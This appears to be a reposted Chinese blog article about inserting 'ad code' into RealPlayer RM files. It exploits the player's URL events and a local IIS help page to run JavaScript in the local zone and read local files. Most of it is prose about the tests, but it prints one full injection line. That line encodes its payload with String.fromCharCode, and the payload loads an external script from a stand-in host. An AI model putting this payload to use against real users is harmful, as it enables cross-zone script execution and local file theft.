商城首页欢迎来到中国正版软件门户

您的位置: 首页 > 文章列表 > 编程开发 > rm格式插入广告代码

rm格式插入广告代码

  发布于2026-07-22 阅读(0)

扫一扫,手机访问

在技术圈,RealPlayer的这类漏洞其实由来已久,早期主要用于挂马。但换个角度想,如果能让它跳转到ja vascript:协议,在本地执行JS代码,会不会更有意思?带着这个疑问,我们进行了测试。

结果令人失望——RealPlayer对ja vascript:协议似乎有所限制,而且查看被插入的RM文件时发现,其本身就已经做了限制,看来支持的协议并不多。不过,试试file:///协议呢?嘿,意外发现它是支持的。这让人联想到前阵子流行的HTML Injection,如果两者结合起来,或许能产生点效果。

具体代码如下:

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#ja vascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/

这段代码插进去之后,会出现一个诡异的链接。点击它,就会执行我指定的JS脚本——微软工程师显然考虑过安全问题,目前能找到的本地HTML文件只有这一个,而且还需要用户手动点击。但事实证明,这段代码确实是本地域执行的,可以读取本地文件。更神奇的是,在RealOne播放的过程中,IE那个“本地执行JS代码”的警告居然会悄然消失。于是,把它放到HTML页面里播放,结果发现:打开任何HTML页面都会弹出警告,但依然能神奇地打开本地域的文件。正常情况下,用window.open是做不到这一点的。

域的限制理论上是可以突破的,只要能找到一个本地存在问题的HTML文件,那就万事大吉了。这类边缘场景能不能真正爆出问题?说实话,可能性还是存在的,值得持续关注。

本文转载于:https://www.jb51.net/article/13549.htm 如有侵犯,请联系zhengruancom@outlook.com删除。
免责声明:正软商城发布此文仅为传递信息,不代表正软商城认同其观点或证实其描述。

热门关注